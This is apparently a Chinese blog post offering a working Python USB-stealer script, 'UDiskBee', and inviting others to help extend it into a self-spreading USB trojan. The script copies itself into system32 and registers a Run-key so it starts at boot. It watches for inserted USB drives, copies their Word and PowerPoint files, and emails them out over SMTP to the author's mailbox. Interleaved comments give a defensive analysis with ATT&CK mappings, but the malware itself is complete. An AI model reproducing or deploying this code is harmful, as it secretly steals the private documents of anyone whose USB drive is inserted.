原本是想制作一个类似于U盘木马的东东,目前能在用户运行程序后实现自我复制到电脑并开机启动,可以随时监控U盘,自动下载电脑上U盘里资料,后台发送给自己,想实现的功能有:最好可以自动侵染到U盘中,以后U盘再插入其他电脑时,可以继续复制
写得非常粗糙,有感兴趣的,大家可以一起完成,私信我
# -*- coding: cp936 -*-
# foolyc CSDN blog: http://blog.csdn.net/foolyc
# cnblogs: http://www.cnblogs.com/foolyc/
#
# Analyst notes (defensive reading of this sample):
#   * Python 2 / pywin32 script (uses _winreg and win32file), Windows only.
#   * Observable artifacts, all taken from the literals below:
#       - file    C:/WINDOWS/system32/UDiskBee.exe
#       - Run-key value "UDiskBee" under
#         HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
#       - staging directory D:/foolbak/<YYYYmmddHHMM>/
#       - outbound SMTP session to smtp.163.com
#   * Behaviours map to ATT&CK T1547.001 (Run-key persistence), T1025 (data
#     from removable media), T1074.001 (local staging) and T1048
#     (exfiltration over a non-C2 protocol).
#   * The listing is reproduced as published; the quote characters were
#     mangled by the hosting site and are left untouched.
import win32file
import shutil
import os
import time
import _winreg
import subprocess
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart

def addtoautorun():
    # Modify the registry so that the program is launched at boot.
    # The key is opened under HKEY_LOCAL_MACHINE with KEY_WRITE, which normally
    # requires administrative rights, so an unprivileged user running the
    # sample should fail here. Auditing writes to this Run key (and alerting
    # on values that point into system32) covers this step.
    key=_winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE,r‘SOFTWARE\Microsoft\Windows\CurrentVersion\Run‘,0,_winreg.KEY_WRITE)
    _winreg.SetValueEx(key,"UDiskBee",0,_winreg.REG_SZ,r‘C:/WINDOWS/system32/UDiskBee.exe‘)

def getremovabledisk():
    # Return the root paths of the currently mounted drives that are treated
    # as USB sticks.
    drives=[]
    # Bitmask of present logical drives; bit i corresponds to drive_all[i].
    sign=win32file.GetLogicalDrives()
    drive_all=["A:\\","B:\\","C:\\","D:\\","E:\\","F:\\","G:\\","H:\\","I:\\",
               "J:\\","K:\\","L:\\","M:\\","N:\\","O:\\","P:\\","Q:\\","R:\\",
               "S:\\","T:\\","U:\\","V:\\","W:\\","X:\\","Y:\\","Z:\\"]
    for i in range(25):
        if (sign&1<<i):
            # Drive type 2 is DRIVE_REMOVABLE in the Win32 API.
            if win32file.GetDriveType(drive_all[i])==2:
                free_bytes,total_bytes,total_free_bytes=win32file.GetDiskFreeSpaceEx(drive_all[i])
                # Only volumes whose total size is below 17 GiB are kept.
                if (total_bytes/1024/1024/1024)<17:
                    drives.append(drive_all[i])
    return drives

def copyfile(drives):
    # Copy selected document types from every drive in `drives` into a
    # timestamped folder under D:/foolbak/, recreating the source directory
    # layout. A process that walks a newly inserted removable volume and
    # writes office documents to a fixed local folder is the behaviour to
    # look for in file-system telemetry.
    target_dir=‘D:/foolbak/‘
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)
    # One staging folder per run, named with minute resolution.
    today=target_dir+time.strftime(‘%Y%m%d%H%M‘)+‘/‘
    if not os.path.exists(today):
        os.makedirs(today)
    for udisk in drives:
        for root, dirs, files in os.walk(udisk):
            for one in files:
                # Selection is by file-name extension only.
                type = os.path.splitext(one)[1]
                if type == ".ppt" or type == ".pptx" or type == ".doc" or type == "docx" :
                    # root[3:] drops the "X:\" prefix so the relative path can
                    # be appended to the staging folder.
                    if len(root)>3 and not os.path.exists(today+root[3:]):
                        os.makedirs(today+root[3:])
                    shutil.copy(root+‘/‘+one,today+root[3:]+‘/‘+one)

def sendfile(filepath):
    # Mail one staged file as an attachment. The addresses and the password
    # are masked ("**") in the published listing; in a real sample they would
    # be hard-coded credentials recoverable by static analysis.
    # No starttls() call appears, and the connection is whatever
    # smtplib.SMTP('smtp.163.com') opens by default. Blocking or alerting on
    # direct outbound SMTP from workstations is the relevant egress control.
    from_mail=‘**@163.com‘
    to_mail=‘**@qq.com‘
    msg=MIMEMultipart()
    msg[‘From‘]=from_mail
    msg[‘To‘]=to_mail
    msg[‘Subject‘]=‘subject‘
    # The whole file is read into memory and attached as one MIME part.
    content=MIMEText(open(filepath, ‘r‘).read(), ‘base64‘, ‘gb2312‘)
    content["Content-Type"] = ‘application/octet-stream‘
    # The attachment file name is the full local staging path.
    content.add_header(‘content-disposition‘,‘attachment‘,filename=filepath)
    msg.attach(content)
    server=smtplib.SMTP(‘smtp.163.com‘)
    server.docmd(‘ehlo‘,‘**@163.com‘)
    server.login(‘**@163.com‘,‘**‘)
    server.sendmail(from_mail,to_mail,msg.as_string())
    server.quit()

def sendall():
    # Walk the whole staging tree and mail every file found there, pausing
    # 30 seconds after each message. Nothing in this function removes files
    # afterwards, so the staging tree stays on disk as forensic evidence.
    for root, dirs, files in os.walk(‘D:/foolbak/‘):
        for one in files:
            tempfile=root+‘/‘+one
            sendfile(tempfile)
            time.sleep(30)

if __name__=="__main__":
    # First run (no copy in system32 yet): install, register autorun, then
    # start the installed copy. Writing an unsigned executable into system32
    # is itself a detection opportunity and needs elevated rights.
    if not os.path.isfile(‘C:/WINDOWS/system32/UDiskBee.exe‘):
        shutil.copy(os.getcwd()+‘/‘+‘UDiskBee.exe‘,‘C:/WINDOWS/system32/UDiskBee.exe‘)
        addtoautorun()
        subprocess.Popen(‘C:/WINDOWS/system32/UDiskBee.exe‘)
    else :
        # Later runs: poll the set of removable drives every 20 seconds.
        drives_bk=[]
        while 1:
            time.sleep(20)
            drives=getremovabledisk()
            if (drives!=drives_bk)&(len(drives_bk)<len(drives)): # a new USB disk appeared
                drives_bk=drives
                copyfile(drives)
                sendall()
            if (drives!=drives_bk)&(len(drives_bk)>len(drives)): # a disk was removed
                drives_bk=drives
参考资料:
http://www.cnblogs.com/xiaowuyi/archive/2012/03/17/2404015.html
原文地址:http://www.cnblogs.com/foolyc/p/3779036.html